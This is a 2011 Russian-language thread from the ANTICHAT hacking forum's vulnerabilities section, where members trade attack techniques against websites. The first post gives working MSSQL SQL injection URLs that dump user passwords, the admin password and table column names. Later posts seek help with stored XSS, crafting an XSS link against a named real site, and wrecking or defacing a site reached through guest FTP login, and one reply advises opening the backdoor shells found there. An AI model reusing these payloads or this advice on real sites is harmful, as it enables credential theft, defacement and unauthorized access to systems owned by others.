HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.09.2011, 01:00
JokerBaD
Новичок
Регистрация: 18.05.2009
Сообщений: 2
С нами: 8939126

Репутация: 0
По умолчанию

Всем спасибо разобрался))))
Может кому пригодится:
использовал вывод в XML актуально только для MSSQL

hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+100+ pw+FROM+Users+for+xml+auto)-- выводит 100 паролей пользователей в Xml формате очень удобно!

так если hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+pw +FROM+Users+where+login='admin'+for+xml+auto)-- выводит только админа))))

а если фильтруется запятая или пишет что URL слишком длинный при том мы пытаемся вытянуть имена полей таблиц использвал такую конструкцию запроса:
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Users'+and+column_name+not+in+(select+to p+1+column_name+from+information_schema.columns+wh ere+table_name='Users'))--

далее top+1 top+2 top+3 и так далее)))Все удачи во взломах!
PS я ломал не просто так а была необходимость)
 
Ответить с цитированием

  #2  
Старый 07.11.2011, 01:00
Kasper1898
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами: 7719446

Репутация: 0
По умолчанию

Кто поможет с XSS активной,у меня скрипт ифрейма не сохраняется в странице уязвимого сайта
IMAGE http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg
 
Ответить с цитированием

  #3  
Старый 13.11.2011, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

Цитата:

Сообщение от Kasper1898

Кто поможет с XSS активной,у меня скрипт ифрейма не сохраняется в странице уязвимого сайта
IMAGE http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg

не понятно что ты хочешь ,
он так не когда не будет работать,
ты не объявил путь до скрипта js в форме
примерно так надо

/js/
вставь его после

но тогда в форме убери action="/js/xss.js

пробуй
 
Ответить с цитированием

  #4  
Старый 14.11.2011, 01:00
1nt
Новичок
Регистрация: 09.04.2010
Сообщений: 0
С нами: 8468691

Репутация: 0
По умолчанию

скрипт после обновления не будет работать полюбому, т.к. js-код выполняется на клиентской машине, а все действия по изменению кода страницы, которые вы делаете - вы делаете у себя. На сервере код не изменяется после редактирования кода, поэтому после обновления страницы ничего не будет.
Kasper1898, внимательно перечитай описание к уязвимости, ты неправильно понял суть эксплуатации.
MOV_EAX, тоже самое.

Код выполняться будет, в простейшем случае, когда, например, на сервере вообще в двиге отключена защита и поставлена опция вроде "интерпретировать посты как js-код", то тогда в пост на форуме можно вписать alert(), и он выполнится. Простейший пример, но неработающий в наше время. Читаем маны.
 
Ответить с цитированием

  #5  
Старый 14.11.2011, 01:00
MOV_EAX
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами: 8553206

Репутация: 5
По умолчанию

да согласен ,если он исходный html код страницы сам решил переделать у себя на рабочем столе просто так его тестил конечно нечего не выйдет я то думал он багу нашел
 
Ответить с цитированием

  #6  
Старый 15.11.2011, 01:00
Dinga
Постоянный
Регистрация: 17.02.2011
Сообщений: 495
С нами: 8017526

Репутация: 18
По умолчанию

Проблема с кодировкой при выводе инфы при помощи скули

code:

8�|2011-09-27|��� - �� 4.10- �����. � �/�, ������. �.5-8.

Как сделать понятнее?
 
Ответить с цитированием

  #7  
Старый 16.11.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Переключить кодировку в браузере.
 
Ответить с цитированием

  #8  
Старый 25.11.2011, 01:00
l575
Познающий
Регистрация: 12.07.2010
Сообщений: 31
С нами: 8334326

Репутация: -1
По умолчанию

Я просканировала сайт и нашла уязвимость в порте 21: логин - guest, пароль - guest.
Я зашла на сайт через FileFilla, ввела имя хоста, логин и пароль.
Там я обнаружила, что на сайт в разные его папки залиты трои Backdoor.
Что с этим можно сделать, чтобы грохнуть сайт? или изменить его.
Там такие файлы: cgi.php, in.php. shells.php. При открытии cgi.php Касперский выдаёт, что, что это Backdoor эксплойт.
 
Ответить с цитированием

  #9  
Старый 25.11.2011, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

l575, заходить на эти бэкдоры (шеллы) из браузера (если они вообще доступны из веба) и надеяться что на них нет паролей.

Прав записи у ftp пользовеля guest наверняка ведь нет?
 
Ответить с цитированием

  #10  
Старый 14.12.2011, 01:00
cacucko
Новичок
Регистрация: 14.12.2011
Сообщений: 2
С нами: 7585526

Репутация: 0
По умолчанию

Прощу прощения за столь ламерскую тему, но вот на сайте нашел XSS http://2sell.com.ua/ там сразу увидите 2 поля поиска, вопрос: Как узнать адресс результата поиска, т.е. я ввожу к примеру "abrakadabra" в поле, и должен перейти по ссылке что-то вроде "http://2sell.com.ua/search-1.php?search=abrakadabra" , но вместо этого в адр. строке стоит "http://2sell.com.ua/search-1.php" и как из этого сформировать ссыль на уязвимость?
Заранее благодарен!
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.